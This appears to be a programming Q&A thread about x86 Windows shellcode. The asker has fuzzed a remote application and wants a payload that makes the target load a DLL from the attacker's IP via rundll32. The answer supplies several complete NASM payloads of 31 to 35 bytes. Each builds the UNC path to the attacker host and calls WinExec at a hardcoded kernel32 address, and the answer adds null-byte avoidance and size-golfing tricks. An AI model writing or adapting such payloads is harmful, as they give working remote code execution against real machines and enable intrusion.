assembly x86 shellcode machine-code code-size

Re-use string at known address to save bytes and reduce size of shellcode payload

Edit: DISCLAIMER- This is for educational purposes only as I am trying to learn shellcoding in x86 asm -- this is not a request for assistance in writing an in-the-wild exploit in any way.

Basically what I am asking for here - regardless of the "why" I am asking for it is to learn how to take a known piece of information stored in memory such as:

00xxxxxx    ASCII "some information in ASCII"

And re-purpose the information stored at that address in my asm code. Would I perform a lea eax,[address]? I've tried a number of things and nothing results in the information stored in that address space appearing as expected.

--- original-ish post--- I am working on a POC shellcode x86 asm in Windows 32 bit. I've fuzzed a remote application, and am able to execute code - such as this: http://shell-storm.org/shellcode/files/shellcode-482.php

I noticed that the connecting address (attacking address) after the crash is always in the same hard coded address space showing in dump in the debugger as:

00aabbcc   ASCII "192.168.1.XX."

I want to use that above shell-storm cmd.exe shellcode but somehow pass the address space containing my IP address in ASCII to it in order to download/run a rundll32.exe exploit. How would I go about referencing the address space (it does contain null first byte) and pass it along in x86 asm to cmd.exe?

This is just an example of what I used to get code execution. It also works with cmd.exe. Basically on the 4th and 5th lines I am passing "calc.exe" as 8 bytes of plain text if you will hex encoded. I want to modify this to basically execute rundll32 instead of calc or cmd where

rundll32.exe \\<HARD CODED ADDRESS REFERENCE HERE>\x.dll,0

where the above is simply where i insert the hard coded IP that i've observed in memory.

# this is the asm code for launching calc.exe successfully:
#0:  89 e5                   mov    ebp,esp
#2:  55                      push   ebp              ; 4 bytes possibly with low byte = 0?
#3:  89 e5                   mov    ebp,esp
#5:  68 2e 65 78 65          push   0x6578652e       ; ".exe"
#a:  68 63 61 6c 63          push   0x636c6163       ; "calc"
#f:  8d 45 f8                lea    eax,[ebp-0x8]    ; pointer to the string = mov eax, esp
#12: 50                      push   eax
#13: b8 c7 93 c2 77          mov    eax,0x77c293c7    ; kernel32.WinExec
#18: ff d0                   call   eax

In the above example snippit, how would I, in lines 4-5 insert the ASCII value located at the previously mentioned memory address? That is the real meat of my question here regarding x86 asm. Would I use a memcpy? strcpy? I'm kind of a novice and definitely not a daily practitioner of asm.

Solution

After another look at the question, your actual question was about concatenating stuff with a runtime-variable C-string from a known address in the target system. Like sprintf(buf, '\\%s\x.dll', 0x00xxxxxx).

(Actually it turns out it's actually a known constant length and value, and you were just trying to save payload size by copying it.) Update, see below for 35 byte versions that hard-code the whole string in the payload, and a 31-byte version that builds the \\...\x.dll string around the string instead of copying.

Copying data small amounts of data is hard. x86 instructions take code-size for the opcode and for the addressing modes (register or memory) of your data, unless except for instructions with implicit operands like stos or movsb, or push. And even those still use bytes for the opcode. Repeated single-byte elements are hard to take advantage of. At a large scale, if you have room to write a decompressor, you could include run-length encoding or even Huffman coding. But when your data isn't much bigger than a few instructions, it's all just little tricks like in the last part of this answer.

But maybe efficiently hard-coding it can be small enough, without reading the 13-byte IP address from a known address (which takes at least 7 bytes to generate in a register with mov eax, imm32 / not eax to avoid 0 bytes in the immediate)

Two ways to hard-code fixed strings in payloads

In 32-bit mode, repeated push imm32 will build up an arbitrary-length string on the stack (in reverse order, of course).

Start by pushing an xor-zeroed register to get a 0-terminated C string. Your literal string is pure text, so I don't see any reason to worry about zero bytes other than that. But if you did, pad with a filler character and overwrite it with a byte-store from your zero register.

If it's not naturally a multiple of 4 bytes, you can sometimes expand \ to \\ or \\\ or \.\ in paths. Or use push imm8 for the last character (which you push first), also pushing 3 bytes of zeros for free. (Assuming your character is 1..127 so sign-extension produces zeros instead of 0xFF). For this case specifically, WinExec splits on spaces so push ' ' can push a space + terminating 0 bytes.

And/or if 4-byte alignment of the stack isn't needed, use 4-byte push word imm16 for the last 2 bytes of data (operand-size prefix + opcode + 2 bytes of data = 4 bytes of code).

The payload-size overhead is 1 push opcode byte per 4 string bytes, plus the terminator, with the string size potentially padded up to a multiple of 4 byte.

The other main option is to include the string as literal data after the payload.

    ...
    jmp  push_string_address
back_from_call:
    ;; pop  eax      ; or just leave the string address on the stack

    ...

push_string_address:
    call  back_from_call     ; pushes the address of the end of the instruction and jumps
    db    "\\<HARD CODED ADDRESS REFERENCE HERE>\x.dll"    ;, 0
    ; terminating zero byte in the target system will be there from its strcpy

Total overhead: 2-byte jmp rel8 + 5-byte call rel32. + 1-byte pop reg if you do pop it instead of leaving it on the stack as an arg in the 32-bit calling convention.

The call has to be backwards so the high bytes of the rel32 are FF, not 00 for a positive displacement.

In 64-bit mode you can use RIP-relative addressing to easily avoid problematic bytes, even avoiding FF bytes if you want. But jmp / call is actually still more compact.

Comparison of both ways for your case:

I don't see where you're 0-terminating your string. In the "cmd.exe " example you started with, trailing garbage after the space would still run cmd.exe but with args, until there's a 0 byte on the stack anywhere.

Here any non-zero byte in the bottom of incoming EBP will come right after the .exe in your string.

But all the stuff with ebp at all is a waste of space. WinExec takes 2 args: a pointer and an integer. The integer is apparently don't-care if it's out of range for being a GUI window behaviour code so its fine if the first 4 bytes of the string is also the UINT uCmdShow argument. (Apparently the function doesn't use that arg as scratch space before reading the string, or at all). There's no benefit at all to saving the pre-buffer-overflow value of EBP or setting up a "stack frame".

The string breaks up perfectly into 4-byte chunks + one 1-byte that lets us get the terminator cheaply:
\\19 | 2.16 | 8.10 | .10\ | x.dl | l

This is NASM source, where 'x.dl' is a 32-bit constant that produces bytes in memory in that order. (Unlike MASM). NASM only process backslash as a C-style escape inside backquoted strings; single and double quotes are equivalent.

;;; NASM syntax (remove the "2 bytes" counts from the start of each line)
             BITS 32
2 bytes      push    'l'        ; 'l\0\0\0'
5 bytes      push    'x.dl'
5 bytes      push    '.10\'
5 bytes      push    '8.10'
5 bytes      push    '2.16'
5 bytes      push    '\\19'
; 27 bytes to construct the string

   ;; ESP points to the data we just pushed = 0-terminated string
1 byte       push    esp     ; pushes the old value: pointer to the string

 b8 c7 93 c2 77          mov    eax,0x77c293c7    ; kernel32.WinExec
 ff d0                   call   eax

Total: 35 bytes either way, above (push) or below (jmp/call)

NASM listing from nasm -l/dev/stdout foo.asm (creating a flat binary of the shellcode, ready to hexdump into a C string).

     1                          bits 32
     2                          top:
     3 00000000 EB07                jmp  push_string_address
     4                          back_from_call:
     5                              ;; pop  edi      ; or just leave the string address on the stack
     6                                  
     7 00000002 B8C793C277          mov    eax,0x77c293c7    ; kernel32.WinExec
     8 00000007 FFD0                call   eax
     9                                  
    10                          push_string_address:
    11 00000009 E8F4FFFFFF          call  back_from_call     ; pushes the address of the end of the instruction and jumps
    12 0000000E 5C5C3139322E313638-       db    "\\192.168.10.10\x.dll"    
 ;, 0
    12 00000017 2E31302E31305C782E-
    12 00000020 646C6C             
    13                              ; terminating zero byte in the target system will be there from the strcpy we overflowed

(00000023 23 size: db $ - top is a line I included at the bottom to get NASM to calculate the size for me: 0x23 = 35 bytes)

The string itself takes 21 bytes, but the jmp + call take 7 bytes. Same as the opcode overhead from 6 push imm instructions plus push esp. So we're just at the break-even point where a longer string would be more efficient with jmp/call.

Alternate approach: build the string in place around the fixed part

If that memory containing the "192.168.10.10" is in a writeable page, we can write bytes before/after it to make the C-string we want.

;; build a string around the part we want, version 1 (35 bytes)
string_address equ  0x00abcdef
string_length equ   13              ; strlen("192.168.10.10")

    mov  edi,  -(string_address - 2)  ; 5B
    neg  edi                          ; 2B  EDI points 2 byte before the existing string

    mov  word [edi], '\\'             ; 5B  store 2 bytes: prepend \\

    mov  dword [edi + string_length+2], '\x.d'    ; 7B
    push  'l'
    pop   eax                                  ; 'l\0\0\0'
    mov   ah,al                                ; 2B  copy low byte to 2nd byte
    mov  [edi + string_length+2 + 4], eax      ; 3B  append 'll\0\0'
 ;;; append '\x.dll\0\0'

    push edi
    mov    eax,0x77c293c7    ; kernel32.WinExec
    call   eax

Amusingly / frustratingly, this is also 0x23 = 35 bytes!!!

I feel like there should be a more efficient way to get the end of the string written. push/pop + mov to duplicate the low byte feels like a lot.

Or I could mutate one bit-pattern in EAX into another with a 5-byte sub or xor eax, imm32. (Special EAX-only encoding without a ModRM byte). That can produce the zeros without having any in the machine code.

I see another way that saves bytes by moving EDI, and exploiting the redundancy of \ appearing multiple places, using stosb / stosd to append AL or EAX. It saves 2 4 bytes. (See a previous version of the answer for "version 2")

Best so far: 31 bytes. (NASM listing: machine code + source)

;; build a string around the part we want, version 3 (31 bytes)
;; Assumes DF=0 when it runs, which is guaranteed by the calling convention
;;    if we got here from a ret in compiler-generated code
     1                         bits 32
     2                         top:
     3                         str_address equ  0x00abcdef
     4                         str_length equ   13              ; strlen("192.168.10.10")
     5                         
     6 00000000 BF133254FF         mov  edi,  -(str_address - 2)     ; 5B
     7 00000005 F7DF               neg  edi                          ; 2B  EDI points 2 byte before the existing string
     8 00000007 57                 push edi                          ; push function arg now, before modifying EDI
     9                         
    10 00000008 B85C782E64         mov  eax, '\x.d'                  ; low byte = backslash is reusable
    11 0000000D AA                 stosb                             ; 1B   *edi++ = AL   '\'
    12 0000000E AA                 stosb                             ; 1B   *edi++ = AL   '\'
    14                          ;;; we've now prepended \ ;;; EDI is pointing at the start of the original string
    15                         
    16 0000000F 83C70D             add   edi, str_length             ; point EDI past the end, where we want to write more
    17 00000012 AB                 stosd                             ; 1B   *edi = eax; edi+=4;  append '\x.d'
    18 00000013 6A6C               push  'l'
    19 00000015 58                 pop   eax                           ; 'l\0\0\0' in a reg, constructed in 3 bytes
    20 00000016 AA                 stosb                             ; append 'l'
    21 00000017 AB                 stosd                             ; append 'l\0\0\0'
    22                          ;;; append '\x.dll\0\0\0'
    23                           
    24 00000018 B8C793C277         mov    eax,0x77c293c7    ; kernel32.WinExec
    25 0000001D FFD0               call   eax

31 bytes

(NASM listing generated with nasm foo.asm -l/dev/stdout | cut -b -30,$((30+10))-. You can strip out first 32 bytes of each line to recover the original source with <foo.lst cut -b 32- > foo.asm so you can assemble it yourself.)

All of these are untested. Size counts are correct (mostly from NASM calculating it), except the push version.

There may of course be room for more savings I missed.

Or there could be bugs that require extra bytes to fix, or different golfing.

Further ideas: The top byte of EDI is known to be zero. Maybe a 4-byte store of that at some point could get a zero in place then overwrite the bytes before?

I wonder if call far ptr16:32 with a hardcoded segment descriptor (assuming we know what Windows uses as the user-space value of cs) would be smaller than mov/call eax? No: opcode + 4byte absolute addr + 2byte segment = 7 bytes, same as 5-byte mov + 2-byte call eax to reach an absolute address from an unknown EIP (so we can't use 5-byte call rel32).

For more code-size optimization ideas in general, see https://codegolf.stackexchange.com/questions/132981/tips-for-golfing-in-x86-x64-machine-code